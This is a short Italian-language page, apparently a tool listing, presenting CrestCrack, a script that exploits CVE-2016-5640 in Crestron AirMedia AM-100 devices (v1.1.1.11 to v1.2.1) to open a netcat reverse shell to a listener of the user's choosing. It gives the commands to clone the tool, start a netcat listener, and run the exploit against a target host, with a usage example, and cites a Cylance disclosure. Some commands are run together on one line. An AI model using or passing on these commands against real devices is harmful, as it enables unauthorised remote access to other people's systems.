
Sfrutta CVE-2016-5640 / CLVA-2016-05-002 contro Crestron AM-100
CrestCrack è uno script semplice che sfrutta CVE-2016-5640 / CLVA-2016-05-002 all'interno del Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). Quando vengono forniti argomenti, CrestCrack utilizzerà netcat per creare una reverse shell tra il tuo target e un listener netcat di tua scelta.
git clone https://github.com/vpnguy/CrestCracknc -lvp 1337./crestcrack.py https://targethost 255.255.255.255 1337###Uso: ./crescrack.py [target host] [listener IP] [listener port]
###Esempio: ./crescrack.py https://targethost 123.123.123.123 3311
Divulgazione della vulnerabilità di Cylance